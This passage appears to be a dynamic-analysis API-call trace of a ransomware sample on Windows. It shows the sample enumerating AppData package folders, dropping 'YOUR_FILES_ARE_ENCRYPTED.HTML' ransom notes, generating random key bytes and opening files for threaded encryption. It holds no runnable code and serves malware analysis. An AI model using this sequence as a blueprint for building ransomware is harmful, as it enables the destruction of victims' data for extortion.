RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.800] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\LocalCache" [0116.800] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\LocalCache\\*" [0116.800] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59f918e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59f918e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59f918e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName=".", cAlternateFileName="")) returned 0x626778 [0116.800] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59f918e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59f918e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59f918e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName="..", cAlternateFileName="")) returned 1 [0116.800] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59f918e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59f918e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59f918e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName="..", cAlternateFileName="")) returned 0 [0116.800] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0116.800] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 136 [0116.800] GetProcessHeap () returned 0x600000 [0116.800] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.1_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.801] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.802] CloseHandle (hObject=0x320) returned 1 [0116.802] GetProcessHeap () returned 0x600000 [0116.802] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.802] GetProcessHeap () returned 0x600000 [0116.802] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.803] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59d3082, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59d3082, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59d3082, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0116.803] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.803] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\LocalState") returned 106 [0116.803] GetProcessHeap () returned 0x600000 [0116.803] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.804] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\LocalState" [0116.804] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\LocalState\\*" [0116.804] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59d3082, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59d3082, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59d3082, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.804] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59d3082, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59d3082, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59d3082, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName="..", cAlternateFileName="")) returned 1 [0116.804] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59d3082, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59d3082, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59d3082, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName="..", cAlternateFileName="")) returned 0 [0116.804] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.804] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 136 [0116.804] GetProcessHeap () returned 0x600000 [0116.804] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.1_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.805] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.806] CloseHandle (hObject=0x320) returned 1 [0116.806] GetProcessHeap () returned 0x600000 [0116.806] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.806] GetProcessHeap () returned 0x600000 [0116.806] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.806] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59d3082, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59d3082, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59d3082, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0116.806] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.806] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\RoamingState") returned 108 [0116.806] GetProcessHeap () returned 0x600000 [0116.806] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.806] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\RoamingState" [0116.806] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\RoamingState\\*" [0116.806] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59d3082, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59d3082, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59d3082, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName=".", cAlternateFileName="")) returned 0x626778 [0116.806] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59d3082, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59d3082, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59d3082, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName="..", cAlternateFileName="")) returned 1 [0116.806] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59d3082, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59d3082, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59d3082, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName="..", cAlternateFileName="")) returned 0 [0116.806] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0116.806] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 138 [0116.806] GetProcessHeap () returned 0x600000 [0116.806] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.1_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.807] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.808] CloseHandle (hObject=0x320) returned 1 [0116.808] GetProcessHeap () returned 0x600000 [0116.808] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.808] GetProcessHeap () returned 0x600000 [0116.808] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.808] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59f918e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59f918e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59f918e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0116.808] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.808] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\Settings") returned 104 [0116.808] GetProcessHeap () returned 0x600000 [0116.808] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.808] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\Settings" [0116.808] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\Settings\\*" [0116.808] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59f918e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59f918e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ade105, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0116.810] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59f918e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59f918e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ade105, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName="..", cAlternateFileName="")) returned 1 [0116.810] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59f918e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59f918e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59f918e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0116.810] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.810] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 117 [0116.810] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0116.810] lstrlenW (lpString=".lock") returned 5 [0116.810] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0116.810] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59f918e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5b508d8, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0116.810] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.810] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\Settings\\settings.dat") returned 117 [0116.810] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0116.810] lstrlenW (lpString=".dat") returned 4 [0116.810] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0116.810] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0116.810] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.1_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x214 [0116.810] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0116.810] GetProcessHeap () returned 0x600000 [0116.810] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0116.813] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="89") returned 2 [0116.813] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="F8") returned 2 [0116.813] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="FD") returned 2 [0116.813] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="44") returned 2 [0116.813] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="BC") returned 2 [0116.813] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="8B") returned 2 [0116.813] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="30") returned 2 [0116.813] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="6A") returned 2 [0116.813] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="12") returned 2 [0116.813] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="48") returned 2 [0116.813] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="47") returned 2 [0116.813] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="1A") returned 2 [0116.813] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="D0") returned 2 [0116.813] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="65") returned 2 [0116.813] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="3C") returned 2 [0116.813] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="3D") returned 2 [0116.813] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="9D") returned 2 [0116.813] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="33") returned 2 [0116.813] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="C8") returned 2 [0116.813] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="C7") returned 2 [0116.813] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="8E") returned 2 [0116.813] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="56") returned 2 [0116.813] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="E6") returned 2 [0116.813] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="91") returned 2 [0116.813] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="29") returned 2 [0116.814] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="1E") returned 2 [0116.814] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="BF") returned 2 [0116.814] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="EB") returned 2 [0116.814] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="30") returned 2 [0116.814] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="EE") returned 2 [0116.814] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="72") returned 2 [0116.814] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="27") returned 2 [0116.814] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\Settings\\settings.dat" [0116.814] CreateIoCompletionPort (FileHandle=0x214, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0116.814] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0116.814] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5ade105, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ade105, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ade105, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0116.814] StrStrIW (lpFirst="settings.dat.LOG1", 